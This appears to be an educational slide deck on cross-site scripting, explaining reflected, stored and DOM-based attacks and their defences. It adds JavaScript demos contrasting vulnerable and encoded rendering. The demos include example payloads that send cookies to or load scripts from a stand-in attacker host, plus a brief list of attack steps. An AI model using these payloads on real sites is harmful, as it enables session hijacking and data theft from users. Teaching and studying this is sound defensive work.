What is an XSS Attack?
Cross-site scripting (XSS) is a potentially dangerous security vulnerability found in web-based applications.
It allows a malicious user to inject a variety of code into a web page.
XSS is very easy to execute and long and arduous to repair: an XSS hole takes about 52 days to fix, and 10-25 XSS holes are found in commercial products every month.
During an attack "everything looks fine" to the end user, but in reality they are exposed to an endless range of threats.
Types of XSS Attacks
Non-Persistent (Reflected)
The most common type.
When unvalidated user-supplied data is echoed into the resulting web page without HTML encoding, client-side code can be injected into the dynamically generated page.
The attacker convinces a user to follow a malicious URL; the server reflects the code carried in that URL into the resulting page.
The injected script now runs in the context of that page, so the attacker has full access to the page's content.
Attack Scenario of Non-Persistent XSS
1) The user comes in contact with a malicious link, form, or redirection.
2) The bank's web application is requested with the call the attacker prepared.
3) Through an XSS vulnerability in the banking application, the XSS code is inserted into the page.
4) The infected page, with the XSS code in it, is sent to the user.
5) The XSS code arrives in the context of the bank's page, so the browser's Same Origin policy treats it as the bank's own script and does not protect the user.
6) The XSS code sends stolen data to the attacker's server.
Methodology
Let us look at how this works with a simple example of a search feature on a website.
The HTML the browser processes looks like this:
Methodology (contd.)
A non-persistent reflection point requires a third party, the victim, to be lured into triggering it.
Imagine an e-mail like this being sent to customers:
The e-mail does not show the full URL, hiding the malicious code at the very end.
Types of XSS Attacks (contd.)
Persistent (Stored)
Allows the most powerful kinds of attacks.
First, the data is stored on the server by the web application; it is later shown to users on a web page without any HTML encoding.
Example: an online message board that allows users to post messages for other users to read.
With this method a malicious script can be served more than once, so an attack can affect a large number of users, and the application can even be infected by an XSS virus or worm.
Attack Scenario of Persistent XSS
1) The bank's web application is called with the XSS code.
2) The malicious code enters through an XSS vulnerability in the application and is stored there.
3) A user calls the bank's web application.
4) The malicious code is loaded from storage into the web page.
5) The infected web page is sent to the user.
6) The XSS code arrives in the context of the bank's page, so the browser's Same Origin policy treats it as the bank's own script and does not protect the user.
7) The XSS code sends stolen data to the attacker's server.
Methodology
Step A) On the product.php?id=1 page, users see the product along with customer comments.
Step B) On product_review.php?id=1 a hacker leaves a review containing malicious code.
Methodology (contd.)
Step C) The hacker receives a thank-you page.
Step D) The attack does not show up immediately, but when anyone returns to product.php?id=1, the new comment, and the script inside it, is displayed.
Methodology (contd.)
The HTML the browser now processes includes the malicious code, hidden in the page source:
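The search feature above (reflected) and the product-review page (stored) in code, as an added example that is not part of the original slides: each page is rendered once without output encoding and once with it, so the same payload either becomes a script element or is shown as harmless text. The host names, URLs, payloads and review texts are constructed for this demo.

```javascript
// Added example, not part of the original slides: the search feature (reflected)
// and the product-review page (stored) rendered with and without HTML encoding.
// Host names, URLs, payloads and review texts are constructed for this demo.

// Minimal HTML encoding for data placed between tags or in quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Does a rendered page still contain an executable script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// --- Reflected (non-persistent): the search term from the URL is echoed back ---
function searchPageVulnerable(url) {
  const q = new URL(url).searchParams.get("q") || "";
  return `<h1>Results for: ${q}</h1>`;             // untrusted data, no encoding
}

function searchPageFixed(url) {
  const q = new URL(url).searchParams.get("q") || "";
  return `<h1>Results for: ${escapeHtml(q)}</h1>`; // markup is rendered as text
}

// The kind of link a phishing e-mail hides at the end of a long URL.
const attackerLink =
  "https://shop.example/search?q=" +
  encodeURIComponent('<script>location="https://evil.example/?c="+document.cookie</script>');

// --- Stored (persistent): one review is shown to every later visitor -------------
const reviews = new Map(); // productId -> list of comment strings

function postReview(productId, comment) {
  if (!reviews.has(productId)) reviews.set(productId, []);
  reviews.get(productId).push(comment);  // stored as-is, like the deck's product_review.php
  return "Thank you for your review";     // the attacker sees nothing unusual
}

function productPage(productId, encodeOutput) {
  const items = (reviews.get(productId) || [])
    .map(c => `<li>${encodeOutput ? escapeHtml(c) : c}</li>`)
    .join("");
  return `<h1>Product ${escapeHtml(productId)}</h1><ul>${items}</ul>`;
}

// Demo: the same payload, with and without output encoding.
postReview("1", "Great product!");
postReview("1", '<script src="https://evil.example/x.js"></script>');

console.log(containsScriptTag(searchPageVulnerable(attackerLink))); // true
console.log(containsScriptTag(searchPageFixed(attackerLink)));      // false
console.log(containsScriptTag(productPage("1", false)));            // true: every visitor runs it
console.log(containsScriptTag(productPage("1", true)));             // false
```

The difference between the two cases is only where the payload lives: in the reflected case it travels in the victim's own request and reaches one user per click, in the stored case it is written once and reaches every reader of the page. The fix is the same for both, encode at the point where untrusted data is written into HTML, not at the point where it is received.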
Types of XSS Attacks (contd.)
DOM-Based (Local)
The Document Object Model (DOM) is the standard object model for representing HTML or XHTML.
Here the problem exists within the page's own client-side script, which takes attacker-controlled data and writes it into the DOM; the server may never see the payload.
If the vulnerable page lives on the client's local system and an attacker hosts a malicious site that loads it, a script can be injected into that page.
The attacker's script then runs with the privileges of that user's browser on their system.
Attack Scenario of DOM-Based XSS
1) The bank's web application is requested with the call the attacker prepared.
2) The XSS code is inserted into a cookie.
3) The cookie with the malicious code is sent to the user and stored on their machine.
4) The user calls the bank's web application.
5) The page's client-side script takes the malicious code from the cookie and writes it into the web page.
6) The infected web page is displayed to the user.
7) The XSS code sends stolen data to the attacker's server.
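A DOM-based case in code, as an added example that is not part of the original slides: the page's own client-side script reads a value from the URL fragment and writes it into the document. The fragment is never sent to the server, so a server-side filter cannot see the payload. The fakeElement below stands in for a real DOM node so the code runs outside a browser; the bank host name, page name and payload are constructed for this demo.

```javascript
// Added example, not part of the original slides: a DOM-based XSS in a page's own
// client-side script. The value is carried in the URL fragment, which the browser
// never sends to the server, so server-side checks do not see it. The fakeElement
// below stands in for a real DOM node so the code runs outside a browser; the URL,
// page name and payload are constructed for this demo.

// What the server receives for a request: path and query only, never the fragment.
function requestLineSeenByServer(url) {
  const u = new URL(url);
  return `GET ${u.pathname}${u.search} HTTP/1.1`;
}

// Stand-in for a DOM element: innerHTML is parsed as markup, textContent is not.
function fakeElement() {
  const el = { innerHTML: "", textContent: "" };
  // number of inline event handlers (onerror=, onload=, ...) the markup would create
  Object.defineProperty(el, "injectedHandlers", {
    get() { return (el.innerHTML.match(/\bon\w+\s*=/gi) || []).length; },
  });
  return el;
}

// Reads "name" from the fragment, e.g. https://bank.example/welcome.html#name=Alice
function nameFromFragment(url) {
  const fragment = new URL(url).hash.slice(1);        // drop the leading '#'
  return new URLSearchParams(fragment).get("name") || "guest";
}

// Vulnerable: the client-side script copies untrusted data into innerHTML.
function renderWelcomeVulnerable(url, el) {
  el.innerHTML = "Welcome, " + nameFromFragment(url); // markup is parsed and executed
  return el;
}

// Fixed: write the untrusted value as text; the characters are shown literally.
function renderWelcomeFixed(url, el) {
  el.textContent = "Welcome, " + nameFromFragment(url);
  return el;
}

// Constructed payload: an image whose error handler runs attacker code.
const payload = 'name=<img src=x onerror="alert(document.cookie)">';
const victimUrl = "https://bank.example/welcome.html?lang=en#" + payload;

console.log(requestLineSeenByServer(victimUrl));                                 // GET /welcome.html?lang=en HTTP/1.1
console.log(renderWelcomeVulnerable(victimUrl, fakeElement()).injectedHandlers); // 1
console.log(renderWelcomeFixed(victimUrl, fakeElement()).injectedHandlers);      // 0
```

The payload uses an event handler rather than a script tag because HTML5 browsers do not execute script elements inserted through innerHTML; the stand-in element only models the parse-as-markup versus insert-as-text distinction, which is the whole difference between the vulnerable and fixed sinks.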
Steps to an XSS Attack
1) Select a target: find an XSS hole and check whether the site uses cookies; if it does, you have found a target.
2) Testing: insert code or a script pointing at the vulnerability, and make sure the page does not appear broken.
3) XSS execution: send the crafted URL to launch it; more experienced attackers chain a few redirects to steal cookies, return to the site, and then attack it harder.
4) Decide what to do with the data: once data has been collected, a further attack can be carried out.
Existing Methods to Solve XSS Problems
A. Dynamic Approach
1) Vulnerability analysis based approach: tracks untrusted data through the application at the character level.
2) Attack prevention approach: a web proxy inspects traffic and blocks the transfer of sensitive information to the attacker.
B. Static Analysis
1) String analysis.
2) Preventing XSS by identifying untrusted scripts.
3) Software testing techniques (black-box testing).
C. Static and Dynamic Analysis Combination
Lattice-based analysis (white-box testing): WebSSARI is a tool that combines static and runtime features, applying static taint-propagation analysis to find security vulnerabilities.
Conclusion
XSS is regarded as the number one and most prevalent website vulnerability on the internet.
No one is ever completely safe from XSS.
Developers cannot be expected to write flawless code or to have round-the-clock personnel to answer every possible vulnerability issue.
As XSS vulnerabilities continue to grow, the best protection is to be careful and aware of its existence, and to HTML-encode untrusted data wherever it is written into a page.